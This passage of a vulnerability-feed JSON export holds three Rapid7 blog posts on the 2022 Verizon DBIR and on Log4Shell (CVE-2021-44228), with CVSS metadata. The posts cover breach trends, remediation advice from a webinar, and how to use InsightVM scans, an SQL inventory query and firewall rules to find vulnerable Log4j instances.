"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T13:56:09", "description": "![3 Takeaways From the 2022 Verizon Data Breach Investigations Report](https://blog.rapid7.com/content/images/2022/05/dbir-2022-takeaways.jpg)\n\nSometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they're the right ones \u2014 and providing increased motivation to act decisively based on that outlook.\n\nThe 2022 edition of [Verizon's Data Breach Investigations Report (DBIR)](<https://www.verizon.com/business/en-gb/resources/reports/dbir/>), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. This year's DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months \u2014 particularly, the threat of [ransomware](<https://www.rapid7.com/solutions/ransomware/>) and the increasing relevance of complex supply chain attacks.\n\nHere are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.\n\n## 1\\. Ransomware's rise is reaffirmed\n\nIn 2021, it was hard to find a cybersecurity headline that didn't somehow pertain to ransomware. It impacted some [80% of businesses last year](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) and threatened some of the institutions most critical to our society, from [primary and secondary schools](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) to [hospitals](<https://www.pewtrusts.org/en/research-and-analysis/blogs/stateline/2022/05/18/ransomware-attacks-on-hospitals-put-patients-at-risk>).\n\nThis year's DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found \u2014 that's a greater increase than we saw in the past 5 years _combined_. In fact, nearly 50% of all system intrusion incidents \u2014 i.e., those involving a series of steps by which attackers infiltrate a company's network or other systems \u2014 involved ransomware last year.\n\nWhile the threat has massively increased, the top methods of ransomware delivery remain the ones we're all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon's data. The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.\n\n## 2\\. Attackers are eyeing the supply chain\n\nIn 2021 and 2022, we've been using the term \"supply chain\" more than we ever thought we would. COVID-induced disruptions in the flow of commodities and goods caused [lumber to skyrocket](<https://bdmag.com/lumber-price-volatility-supply-chain/>) and [automakers to run short on microchips](<https://www.consumerreports.org/buying-a-car/global-chip-shortage-makes-it-tough-to-buy-certain-cars-a8160576456/>).\n\nBut security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from [Kaseya](<https://www.rapid7.com/blog/post/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) to [SolarWinds](<https://www.rapid7.com/blog/post/2021/01/12/update-on-solarwinds-supply-chain-attack-sunspot-and-new-malware-family-associations/>) \u2014 not to mention the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) \u2014 reminded us all that vendors' systems are just as likely a vector of attack as our own.\n\nUnfortunately, Verizon's Data Breach Investigations Report indicates these incidents are not isolated events \u2014 the software supply chain is, in fact, a major avenue of exploitation by attackers. In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner's systems, the study found.\n\nPut another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner's network than on your own.\n\nWhile supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it's critical for companies to keep an eye on both their own and their vendors' security posture. This could include:\n\n * Demanding visibility into the components behind software vendors' applications\n * Staying consistent with regular patching updates\n * Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head\n\n## 3\\. Mind the app\n\nBetween [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.\n\nCompromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon's latest DBIR. Meanwhile, web servers themselves were the most commonly exploited asset type \u2014 they were involved in nearly 60% of documented breaches.\n\nMore than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. That said, 30% of basic web application attacks did involve some form of exploited vulnerability \u2014 a percentage that should be cause for concern.\n\n\"While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,\" the authors of the Verizon DBIR wrote.\n\nThat means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2022, reinforcing the importance of being able to quickly and efficiently test your applications for the [most common types of vulnerabilities](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) that hackers take advantage of.\n\n## Stay the course\n\nFor those who've been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar \u2014 and with so many major breaches and vulnerabilities that claimed the industry's attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.\n\nIf your go-forward cybersecurity plan reflects these trends, that means you're on the right track. Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.\n\n_**Additional reading:**_\n\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[Are You in the 2.5% Who Meet This Cybersecurity Job Requirement?](<https://www.rapid7.com/blog/post/2022/05/20/are-you-in-the-2-5-who-meet-this-cybersecurity-job-requirement/>)_\n * _[What's Changed for Cybersecurity in Banking and Finance: New Study](<https://www.rapid7.com/blog/post/2022/05/10/whats-changed-for-cybersecurity-in-banking-and-finance-new-study/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T13:22:17", "type": "rapid7blog", "title": "3 Takeaways From the 2022 Verizon Data Breach Investigations Report", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-31T13:22:17", "id": "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "href": "https://blog.rapid7.com/2022/05/31/3-takeaways-from-the-2022-verizon-data-breach-investigations-report/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "![Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](https://blog.rapid7.com/content/images/2022/02/log4shell-new-normal.jpg)\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n![Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](https://play.vidyard.com/t9PRKSRf11asqgZgs4YHms.jpg)\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still _versions vulnerable to Log4Shell.\n\n\u201cWe're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolutely necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.\n\n * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)\n * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)\n * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)\n * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)\n * [ShadowServer](<https://www.shadowserver.org/>)\n * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)\n\n_**Additional reading:**_\n\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T18:00:00", "type": "rapid7blog", "title": "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T18:00:00", "id": "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "href": "https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T23:41:15", "description": "![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/insightvm-log4j.jpg)\n\nThere are many methods InsightVM can use to identify vulnerable software. Which method is best depends on the software and specific vulnerability in question, not to mention variability that comes into play with differing network topologies and Scan Engine deployment strategies. When it comes to a vulnerability like [CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), affecting a software library (Log4j) that is used to build other software products and may not expose its presence in an obvious way, the situation gets even more complicated. For in-depth analysis on the vulnerability and its attack surface area, [see AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>).\n\nThe intent of this post is to walk InsightVM and Nexpose users through how to best approach detecting exposure to Log4Shell in your environment, while providing some additional detail about how the various checks work under the hood. This post assumes you already have an operational deployment of [InsightVM](<https://www.rapid7.com/products/insightvm/>) or [Nexpose](<https://www.rapid7.com/products/nexpose/>). For additional documentation on scanning for Log4j CVE-2021-44228, take a look at [our docs here](<https://docs.rapid7.com/insightvm/apache-log4j/>).\n\n## Before (or while) you scan\n\nEven before a vulnerability check has been made available, it can be possible to get a sense of your exposure using InsightVM features such as [Query Builder](<https://www.rapid7.com/blog/post/2020/01/13/simplify-your-data-search-with-query-builder-in-insightvm/>), or Nexpose\u2019s [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>). Because we use generic fingerprinting techniques such as querying Linux package managers and enumerating software found in Windows Registry uninstaller keys, the software inventory for assets may include products that are not explicitly supported. Using the search predicate `software.product` `CONTAINS` `log4j` will show packages on Linux systems that have been installed via package managers such as `rpm` or `dpkg`.\n\nAn alternative approach to this is using an [SQL Query Export](<https://docs.rapid7.com/nexpose/creating-reports-based-on-sql-queries/>) using the following query:\n \n \n SELECT\n da.sites AS \"Site_Name\",\n da.ip_address AS \"IP_Address\",\n da.mac_address AS \"MAC_Address\",\n da.host_name AS \"DNS_Hostname\",\n ds.vendor AS \"Vendor\",\n ds.name AS \"Software_Name\",\n ds.family AS \"Software_Family\",\n ds.version AS \"Software_Version\",\n ds.software_class AS \"Software_Class\"\n FROM\n dim_asset_software das\n JOIN\n dim_software ds USING(software_id)\n JOIN\n dim_asset da ON da.asset_id = das.asset_id\n WHERE\n ds.software_class like'%'\n AND\n ds.name ilike '%log4j%'\n ORDER BY\n ds.name ASC\n \n\n## Authenticated and agent-based assessments\n\nThe most reliable way to find vulnerable instances of CVE-2021-44228 is via our authenticated checks (check IDs: `apache-log4j-core-cve-2021-44228`, `apache-log4j-core-cve-2021-44228-2_16`), which perform a complete filesystem search for JAR files matching `log4j-core.*.jar`. The authenticated checks support both Linux and Windows scanning as of version 6.6.121 released December 17, 2021. **Note:** Searching entire file systems across Windows assets is an intensive process that may increase scan time and resource utilization. To allow this, you can [enable Windows file system searching in the scan template](<https://docs.rapid7.com/insightvm/apache-log4j/#authenticated-and-unauthenticated-remote-checks>) in order to use the authenticated check for Log4j on Windows systems.\n\nIn addition to enabling Windows file system search, WMI must be enabled for the authenticated check to run in Windows environments. The check looks for Log4j version information in the JAR filename. On Linux systems, when the `unzip` command is available, that command is used to extract the version from the JAR's manifest file. There is also a fallback mechanism that allows the scanner to attempt to extract the version information from the filename. Customers should ensure they are running version 6.6.121 of the Scan Engine and Console.\n\nFor the find command to run and locate vulnerable JARs, **scans must be configured with root credentials** (either directly or via a privilege elevation mechanism) in the Site Configuration interface. On Windows systems, scans should run with local administrator privileges for the most comprehensive results.\n\nWindows scanning functionality requires product version 6.6.121 or later. Insight Agent collection on Windows for Log4j has begun rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete. If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the \u201c[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)\u201d option in the scan template to ensure that authenticated checks run on Windows systems. Use the [Agent Management](<https://docs.rapid7.com/insight-agent/agent-management/>) interface to determine the version of the Agent being used in your environment.\n\nRead more about scanning for Log4Shell [here](<https://docs.rapid7.com/insightvm/apache-log4j/>) or visit our [Customer Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>).\n\n## Remote scanning\n\n**IMPORTANT:** For the unauthenticated remote check to correctly identify log4shell occurrences in your environment, target assets must be able to communicate back to your scan engine on port 13456.\n\nA remote (unauthenticated) check for CVE-2021-44228 was published in a content release on December 12 9pm ET with Check ID `apache-log4j-core-cve-2021-44228-remote`. This check is platform-independent (will work against Linux, Windows, and other operating systems) and works as follows:\n\n * **IF** any of the following TCP ports are found open: 80, 443, 8080, 8888 \u2014 or, alternatively, if: [Nmap service fingerprinting](<https://www.rapid7.com/blog/post/2020/04/16/nmap-service-detection-for-nexpose-and-insightvm-scan-engines/>) detects HTTP or HTTPS running (note that enabling Nmap service fingerprinting may negatively impact scan times)\n * **THEN** the Scan Engine will attempt to exploit the vulnerability and make the scan target open a connection to the Engine on port 13456.\n * The Engine does not open a TCP listener but does a packet capture to identify connection attempts against 13456/TCP. If a connection attempt to the Engine is detected, this indicates that the target is vulnerable, and the check will fire accordingly. No data is returned from the scanned asset itself; the Engine is only monitoring for connection attempts, and not any additional data.\n * This approach relies on bi-directional networking and requires the scan engine and scan target to be able to \u201ctalk\u201d to each other. In some cases, such as scanning through a VPN, NAT, or firewall, that required bi-directional networking is not available.\n\n##### Further information on enabling bi-directional communication\n\n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/log4j-remote-scan-ports.png)\n\n 1. Create a rule in your firewall (or Layer 3 switch) to allow your Windows Asset / Network Segment (so in this case 192.169.1.10) to respond BACK to your Scan Engine (10.10.190.4) on TCP 13456. \n`Source 192.168.1.10 Service TCP 13456 Destination 10.10.190.4`\n 2. You should already have a Rule from your Scan Engine to allow scan on ports 80,443,8080 and 8888 to your Windows Asset / Network Segment. \n`Source 10.10.190.4 Service 80/443/8080/8888 Destination 192.168.1.255`\n 3. If you are not seeing any response back or seeing that you are finding ZERO vulnerabilities it is very possible that the issue is with the firewall rule (or network configuration). Check your firewall logs for any drops from the Windows Asset on Port 13456 attempting to talk to your Scan Engine. Also make sure that your Scan Engine is allowed to make the request to your Network Segments on ports 80,443,8080,8888 to initialize the trap/attack.\n\n## Product-based checks\n\nWe know that many downstream vendors will issue security advisories of their own in the coming days and weeks. We continue to monitor several vendors for related security advisories. We will have checks for affected products included in our [recurring coverage list](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) as vendors provide details about affected and/or fixed versions. Users can also adapt the Query Builder or SQL Export queries provided above to find products of concern in the meantime, with the caveat that they may not be visible if they use non-standard installation mechanisms.\n\n## Specific vulnerability dashboard and Log4j helpful query\n\nRapid7 released the Specific Vulnerability Dashboard template and the \u201cLog4j by CVE ID\u201d helpful query in the Query Builder on Tuesday, December 13, 2021. Our intent is to allow customers to quickly and easily report on the Log4j vulnerability. More importantly, this gives us a dashboard template that we can leverage in the event of other urgent vulnerability notices.\n\nThe Helpful Query searches a customer\u2019s environment for Log4j via the corresponding CVE ID (not paradoxically). Users can apply this query to the Specific Vulnerability [dashboard template](<https://docs.rapid7.com/insightvm/dashboards>) to create a view into how their environment is being affected.\n\nFollow these steps to create and focus this new dashboard template on Log4j.\n\n * Navigate to the query builder. \n * Click on the add button.\n * Go to the helpful queries section and select the Log4j by CVE ID query. \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image2-2.png)\n * Click the Select Query button.\n * Click Save As for the new query. \n * Give the query a name.\n * Click the Save button.\n * Go to the Dashboards page. \n * Click on the Down Arrow next to the Dashboard name.\n * Select Specific Vulnerability Dashboard. \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image4.png)\n * Edit the information provided if desired\n * Click the OK button\n * To filter the dashboard for Log4j \n * Click the Load Dashboard Filter button\n * Search for your saved Log4j query\n * Click on the name of the query \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image5.png)\n\nInsightVM users may also create a report that\u2019s based on the Specific Vulnerability dashboard template and have this generated on a recurring basis (N number of days, weeks or months). Follow these steps in order to create this report.\n\n * Navigate to the query builder. \n * Click on the Add button.\n * Go to the helpful queries section and select the Log4j by CVE ID query. \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image2-3.png)\n * Once loaded, click the Create Report button.\n * In the report wizard, select Pre-built Reports as the report type. \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image1-2.png)\n * From the list that appears, select Specific Vulnerability Dashboard. \n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/image3-2.png)\n * Enter in the relevant information in the Configure selection. \n * Select "I want to schedule and run a recurring report" to have the report generated multiple times.\n * Click the checkbox titled \u201cPermit users who do not have access to console,\u201d and enter an email address or addresses to have this report automatically delivered as it\u2019s generated.\n * Once ready, click the Save and Complete button\n\nWe hope these additions will help InsightVM users respond to the threat of Log4Shell and reduce friction in identifying its impact to their environments.\n\n## Container security\n\nCustomers who are worried about vulnerable images in their container repos have been able to scan for CVE-2021-44228 using InsightVM\u2019s [Container Security](<https://www.rapid7.com/products/insightvm/features/container-security/>) since December 10 at 2pm ET, thanks to our integration with the [Snyk vulnerability database](<https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720>). It is also possible to [rerun an assessment](<https://docs.rapid7.com/insightvm/managing-container-images#Reassessing-an-image>) on any images that are particularly sensitive to be sure of up-to-date results. Retrieve results via the [Container API](<https://help.rapid7.com/insightvm/en-us/api/api.html#tag/Container>) or the Containers Dashboard:\n\n![Using InsightVM to Find Apache Log4j CVE-2021-44228](https://blog.rapid7.com/content/images/2021/12/container-security-ivm.png)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:17:29", "type": "rapid7blog", "title": "Using InsightVM to Find Apache Log4j CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 